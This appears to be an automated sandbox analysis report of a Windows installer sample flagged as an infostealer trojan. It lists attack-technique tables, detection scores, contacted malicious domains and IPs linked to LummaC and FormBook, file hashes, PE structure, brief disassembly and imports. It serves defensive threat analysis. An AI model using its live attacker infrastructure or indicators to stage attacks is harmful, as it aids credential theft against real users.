Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 22 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
16% | ReversingLabs | Win32.Infostealer.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
fairiespar.cyou | 188.114.97.3 | true | true | unknown | |
klipvumisui.shop | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
true |
| unknown | |
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
188.114.97.3 | fairiespar.cyou | European Union | 13335 | CLOUDFLARENETUS | true | |
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1585368 |
Start date and time: | 2025-01-07 15:25:12 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | setup.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@4/3@3/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
- Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
- Execution Graph export aborted for target setup.exe, PID 5916 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: setup.exe
Time | Type | Description |
---|---|---|
09:26:18 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
188.114.97.3 | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
185.161.251.21 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix | Browse |
| ||
Get hash | malicious | Metasploit | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
NTLGB | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.7307872139132228 |
Encrypted: | false |
SSDEEP: | 3:Nlllul4/X:NllU4/ |
MD5: | 3C34689C4BD27F7A51A67BBD54FA65C2 |
SHA1: | E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735 |
SHA-256: | 4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546 |
SHA-512: | 02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 0.4402487451613905 |
TrID: |
|
File name: | setup.exe |
File size: | 74'584'760 bytes |
MD5: | 76f2e89ace5c9b36679ce13b57c8b752 |
SHA1: | 736b004b46dfb5d0fef7758406883a22f15b1649 |
SHA256: | 16c3793c3deafcfb489b2347d08bfd0a420ce0f8c27dd4afeea05d9d9a99f413 |
SHA512: | b7f872efbae47b45e72e4f05ef46d17506f117019b2fabd78e0a672f3ebc3ce924986ddceaae900afbb85382041d8bc8cf50f8cb5ef798796b89c768b6283a3a |
SSDEEP: | 24576:2+QSkqgnQNDa5lZeGvyErqPW+UHx+/uxVrwiFx7ssa+7:27XqdG7qw3VrTFpsP |
TLSH: | F6F77DED6F1022E187CBEFEDE91293C9F9D85102231116FF239B054AD5EAED84232D59 |
File Content Preview: | MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7....................................................................................................................................... |
Icon Hash: | 2d2e3797b32b2b99 |
Entrypoint: | 0x49b840 |
Entrypoint Section: | CODE |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 1 |
OS Version Minor: | 0 |
File Version Major: | 1 |
File Version Minor: | 0 |
Subsystem Version Major: | 1 |
Subsystem Version Minor: | 0 |
Import Hash: | c1220b6b9a0c9ddea463bab3a99b594f |
Signature Valid: | false |
Signature Issuer: | CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | F7219078FBE20BC1B98BF8A86BFC0396 |
Thumbprint SHA-1: | 30632EA310114105969D0BDA28FDCE267104754F |
Thumbprint SHA-256: | 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2 |
Serial: | 14781BC862E8DC503A559346F5DCC518 |
Instruction |
---|
push ebp |
mov ebp, esp |
add esp, FFFFFFF4h |
push ebx |
push esi |
push edi |
call 00007FBC34A5B463h |
call 00007FBC34A5D732h |
call 00007FBC34A5E3E9h |
call 00007FBC34A61A7Ch |
call 00007FBC34A61CABh |
call 00007FBC34A68A82h |
call 00007FBC34A68AF5h |
call 00007FBC34A6AA40h |
call 00007FBC34A710DFh |
call 00007FBC34A7CF56h |
call 00007FBC34A8751Dh |
call 00007FBC34A88A80h |
call 00007FBC34AA4AAFh |
call 00007FBC34AAA652h |
call 00007FBC34AAAAF1h |
call 00007FBC34AAC4B0h |
call 00007FBC34AADEA3h |
call 00007FBC34AB19FAh |
call 00007FBC34AB28C9h |
call 00007FBC34AB403Ch |
call 00007FBC34ABF1ABh |
call 00007FBC34AC72F6h |
call 00007FBC34AD2E99h |
call 00007FBC34ADD7B8h |
call 00007FBC34AF09B7h |
xor eax, eax |
push ebp |
push 0049B904h |
push dword ptr fs:[eax] |
mov dword ptr fs:[eax], esp |
push 00000001h |
call 00007FBC34A5DACEh |
call 00007FBC34AF36A5h |
mov eax, 0049B580h |
push eax |
push 0049B58Ch |
mov eax, dword ptr [0049E624h] |
call 00007FBC34A7C470h |
call 00007FBC34AF36D3h |
xor eax, eax |
pop edx |
pop ecx |
pop ecx |
mov dword ptr fs:[eax], edx |
jmp 00007FBC34AF399Bh |
jmp 00007FBC35A5AED4h |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2622 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x64400 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x471d8f8 | 0x39c0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
CODE | 0x1000 | 0x9aa88 | 0x9ac00 | ae99869f6d5c9430191b5e1ac5a2ae43 | False | 0.5036995784531503 | data | 6.621930154722223 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
DATA | 0x9c000 | 0x1160 | 0x1200 | dad9cae5d49bb93a2321cc456fdf7b30 | False | 0.4505208333333333 | data | 4.472841393973581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
BSS | 0x9e000 | 0x1500 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.idata | 0xa0000 | 0x2622 | 0x2800 | 6a6036a0f19131189537424c828f6b45 | False | 0.36884765625 | data | 4.911486635960526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.tls | 0xa3000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rdata | 0xa4000 | 0x18 | 0x200 | f0c87208c92fd0d7fee2e7f2dca8ed20 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
.reloc | 0xa5000 | 0x8d1c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
.rsrc | 0xae000 | 0x64400 | 0x64400 | 2cc0bb4107afad2cc351cc07f01eb41c | False | 0.6245494661783042 | data | 7.464731999462781 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_CURSOR | 0xaebf0 | 0x134 | data | 0.4805194805194805 | ||
RT_CURSOR | 0xaed24 | 0x134 | data | 0.38311688311688313 | ||
RT_CURSOR | 0xaee58 | 0x134 | data | 0.36038961038961037 | ||
RT_CURSOR | 0xaef8c | 0x134 | data | 0.4090909090909091 | ||
RT_CURSOR | 0xaf0c0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | 0.4967532467532468 | ||
RT_CURSOR | 0xaf1f4 | 0x134 | data | 0.4642857142857143 | ||
RT_BITMAP | 0xaf328 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | 0.2945859872611465 | ||
RT_BITMAP | 0xaf810 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | 0.521551724137931 | ||
RT_ICON | 0xaf8f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675 |
RT_ICON | 0xafa20 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179 |
RT_ICON | 0xaff88 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548 |
RT_ICON | 0xb0270 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516 |
RT_STRING | 0xb0b18 | 0x178 | data | 0.7420212765957447 | ||
RT_STRING | 0xb0c90 | 0x122 | data | 0.7103448275862069 | ||
RT_STRING | 0xb0db4 | 0x170 | data | 0.8125 | ||
RT_STRING | 0xb0f24 | 0x1a8 | data | 0.6981132075471698 | ||
RT_STRING | 0xb10cc | 0x124 | data | 0.8356164383561644 | ||
RT_STRING | 0xb11f0 | 0x150 | data | 0.7678571428571429 | ||
RT_STRING | 0xb1340 | 0xf6 | data | 0.7642276422764228 | ||
RT_STRING | 0xb1438 | 0xcc | data | 0.9019607843137255 | ||
RT_STRING | 0xb1504 | 0xb4 | data | 0.8 | ||
RT_STRING | 0xb15b8 | 0xe8 | data | 0.8663793103448276 | ||
RT_STRING | 0xb16a0 | 0x154 | data | 0.7558823529411764 | ||
RT_STRING | 0xb17f4 | 0x16a | data | 0.8425414364640884 | ||
RT_STRING | 0xb1960 | 0x3c | data | 0.6833333333333333 | ||
RT_STRING | 0xb199c | 0x140 | data | 0.796875 | ||
RT_STRING | 0xb1adc | 0x142 | data | 0.6242236024844721 | ||
RT_STRING | 0xb1c20 | 0x116 | data | 0.7661870503597122 | ||
RT_STRING | 0xb1d38 | 0xfe | AmigaOS bitmap font "\017_\034 %", 15464 elements, 2nd, 3rd | 0.8464566929133859 | ||
RT_STRING | 0xb1e38 | 0x68 | data | 0.75 | ||
RT_STRING | 0xb1ea0 | 0xb4 | data | 0.6277777777777778 | ||
RT_STRING | 0xb1f54 | 0xae | data | 0.5344827586206896 | ||
RT_RCDATA | 0xb2004 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | Chinese | China | 0.3826497395833333 |
RT_RCDATA | 0xb3804 | 0x1000 | PE32 executable (GUI) Intel 80386, for MS Windows | Chinese | China | 0.36474609375 |
RT_RCDATA | 0xb4804 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | Chinese | China | 0.3255404941660947 |
RT_RCDATA | 0xba314 | 0x11c | Delphi compiled form 'TMainForm' | 0.7676056338028169 | ||
RT_RCDATA | 0xba430 | 0x399 | Delphi compiled form 'TNewDiskForm' | 0.5276872964169381 | ||
RT_RCDATA | 0xba7cc | 0x317 | Delphi compiled form 'TSelectFolderForm' | 0.5372945638432364 | ||
RT_RCDATA | 0xbaae4 | 0x2f7 | Delphi compiled form 'TSelectLanguageForm' | 0.5704874835309618 | ||
RT_RCDATA | 0xbaddc | 0x5d0 | Delphi compiled form 'TUninstallProgressForm' | 0.4576612903225806 | ||
RT_RCDATA | 0xbb3ac | 0x458 | Delphi compiled form 'TUninstSharedFileForm' | 0.43345323741007197 | ||
RT_RCDATA | 0xbb804 | 0x1fa6 | Delphi compiled form 'TWizardForm' | 0.23019007652431497 | ||
RT_GROUP_CURSOR | 0xbd7ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | 1.3 | ||
RT_GROUP_CURSOR | 0xbd7c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | 1.25 | ||
RT_GROUP_CURSOR | 0xbd7d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | 1.25 | ||
RT_GROUP_CURSOR | 0xbd7e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | 1.3 | ||
RT_GROUP_CURSOR | 0xbd7fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | 1.3 | ||
RT_GROUP_CURSOR | 0xbd810 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | 1.3 | ||
RT_GROUP_ICON | 0xbd824 | 0x3e | data | English | United States | 0.8387096774193549 |
RT_VERSION | 0xbd864 | 0x144 | data | Chinese | China | 0.5833333333333334 |
RT_MANIFEST | 0xbd9a8 | 0x462 | XML 1.0 document, ASCII text, with very long lines (1120), with CRLF line terminators | Chinese | China | 0.4839572192513369 |
DLL | Import |
---|---|
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle |
user32.dll | MessageBoxA |
oleaut32.dll | SafeArrayPutElement, SafeArrayCreate, VariantChangeTypeEx, VariantCopy, VariantClear, SysStringLen, SysAllocStringLen |
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumValueA, RegEnumKeyExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid |
kernel32.dll | lstrcmpA, WriteProfileStringA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualFree, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TransactNamedPipe, TerminateThread, TerminateProcess, Sleep, SizeofResource, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesA, SetErrorMode, SetEndOfFile, SetCurrentDirectoryA, RemoveDirectoryA, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileExA, MoveFileA, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExA, LoadLibraryA, IsDBCSLeadByte, IsBadWritePtr, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVersionExA, GetVersion, GetUserDefaultLangID, GetTickCount, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryA, GetSystemDefaultLCID, GetShortPathNameA, GetProfileStringA, GetProcAddress, GetPrivateProfileStringA, GetOverlappedResult, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetComputerNameA, GetCommandLineA, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushFileBuffers, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumResourceLanguagesA, EndUpdateResourceA, DeviceIoControl, DeleteFileA, CreateThread, CreateProcessA, CreateNamedPipeA, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CompareFileTime, CloseHandle, BeginUpdateResourceA |
mpr.dll | WNetOpenEnumA, WNetGetUniversalNameA, WNetGetConnectionA, WNetEnumResourceA, WNetCloseEnum |
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
gdi32.dll | UnrealizeObject, TextOutA, StretchDIBits, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceA, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetCurrentPositionEx, GetClipBox, GetBitmapBits, ExtFloodFill, ExcludeClipRect, EnumFontsA, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateFontIndirectA, CreateDIBitmap, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceA |
user32.dll | WindowFromPoint, WinHelpA, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenuEx, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendNotifyMessageA, SendMessageTimeoutA, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharBuffA, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMessagePos, 